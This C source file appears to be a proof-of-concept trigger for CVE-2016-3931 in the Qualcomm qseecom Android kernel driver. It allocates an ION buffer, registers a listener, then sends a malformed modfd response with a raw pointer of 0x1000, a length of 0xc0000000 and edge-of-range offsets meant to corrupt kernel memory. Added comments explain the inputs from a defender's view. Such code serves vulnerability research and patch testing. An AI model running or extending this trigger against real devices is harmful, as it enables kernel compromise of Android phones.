#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <errno.h>
#include "../kernel/msm/include/uapi/linux/qseecom.h"
#include "../kernel/msm/drivers/staging/android/uapi/linux/ion.h"
/*
 * Allocate one ION buffer through /dev/ion and return a shareable fd for it.
 *
 * Sequence: open the ION device, ION_IOC_ALLOC a 0x1000-byte, 0x1000-aligned
 * buffer, then ION_IOC_SHARE the returned handle.  The process exits if the
 * device cannot be opened.
 *
 * Returns: ifd.fd as filled in by ION_IOC_SHARE.  Neither ioctl result is
 * checked, so if either call fails ifd.fd is an uninitialized stack value and
 * is returned as-is.  ion_fd is never closed; it stays open until exit.
 */
int ion_test()
{
int ion_fd, ret;
char* iondev = "/dev/ion";
printf("open:%s\n",iondev);
ion_fd = open(iondev, O_RDWR);
if (ion_fd < 0) {
/* NOTE(review): strerror() is declared in <string.h>, which this file does not include. */
printf("Failed to open:%s, %s\n", iondev, strerror(errno));
exit(EXIT_FAILURE);
}
printf("ioctl on device: ION ALLOC\n");
/* Only the four fields below are set; any other members of the struct stay uninitialized. */
struct ion_allocation_data data;
data.len = 0x1000;
data.align = 0x1000;
/* Literal 27; the original author's note suggests ION_HEAP_CARVEOUT_MASK was intended — not verified against ion.h. */
data.flags = 27;//ION_HEAP_CARVEOUT_MASK;
data.heap_mask = 1<<27;
ret = ioctl(ion_fd, ION_IOC_ALLOC, &data);
/* ret is only printed, never tested; data.handle is used below regardless of success. */
printf("ret is :0x%x, flags:0x%x\n", ret, data.flags);
struct ion_fd_data ifd;
ifd.handle = data.handle;
printf("ioctl on device: ION IOC SHARE\n");
ret = ioctl(ion_fd, ION_IOC_SHARE, &ifd);
printf("ret is :0x%x, fd is: 0x%x\n", ret, ifd.fd);
return ifd.fd;
}
/*
 * Drive the qseecom listener path with a deliberately inconsistent
 * QSEECOM_IOCTL_SEND_MODFD_RESP request.
 *
 * Sequence: obtain an ION fd from ion_test(), open /dev/qseecom, register a
 * listener whose ifd_data_fd is that ION fd, then send a modfd response whose
 * resp_buf_ptr is the bare address 0x1000 (no buffer is allocated), whose
 * resp_len is 0xc0000000, and whose four ifd_data entries all carry
 * cmd_buf_offset == resp_len - 4.  Every ioctl result is printed, none is
 * checked, and neither fd is closed.
 *
 * From a defender's view the interesting input is the offset/length pair:
 * offset + 4 == resp_len exactly, i.e. the last possible in-bounds position
 * for a 4-byte write, combined with a response pointer that is not a valid
 * user buffer.  A driver-side check on that arithmetic is presumably what the
 * CVE-2016-3931 fix adds — the kernel code is not on this page, so that is
 * inferred from the file name, not shown.
 */
void test_qsee_send_modfd_resp()
{
int ifd = ion_test();
int fd, i,ret;
char* dev = "/dev/qseecom";
printf("open:%s\n",dev);
fd = open(dev, O_RDWR);
if (fd < 0) {
/* NOTE(review): strerror() is declared in <string.h>, which this file does not include. */
printf("Failed to open:%s, %s\n", dev, strerror(errno));
exit(EXIT_FAILURE);
}
printf("ioctl on device:REGISTER LISTENER REQ\n");
/* Only ifd_data_fd is set; the remaining members of rcvd_lstnr stay uninitialized. */
struct qseecom_register_listener_req rcvd_lstnr;
rcvd_lstnr.ifd_data_fd = ifd;
ret = ioctl(fd, QSEECOM_IOCTL_REGISTER_LISTENER_REQ, &rcvd_lstnr);
printf("ret is :0x%x\n", ret);
printf("ioctl on device:SEND MODFD CMD REQ\n");
struct qseecom_send_modfd_listener_resp arg;
/* A raw address, not an allocation: the malloc(100) alternative was left commented out. */
arg.resp_buf_ptr = (void*)0x1000;//malloc(100);
/* Assumes ifd_data has at least 4 entries — its size comes from qseecom.h, not visible here. */
for(i=0; i<4;i++){
/* Loop-invariant; resp_len is rewritten with the same value on every iteration. */
arg.resp_len = 0xc0000000;
arg.ifd_data[i].cmd_buf_offset = arg.resp_len - 4;
arg.ifd_data[i].fd = ifd;
}
ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_RESP, &arg);
printf("ret is :0x%x\n", ret);
}
/*
 * Program entry point: prints a banner, runs test_qsee_send_modfd_resp()
 * once, prints a trailer and returns 0 unconditionally.
 *
 * argc and argv are accepted but never read.  Any failure inside the test
 * path is reported by exit(EXIT_FAILURE) from the callees, not by this
 * function's return value.
 */
int main(int argc, char *argv[])
{
printf("main begins...\n");
test_qsee_send_modfd_resp();
printf("main end\n");
return 0;
}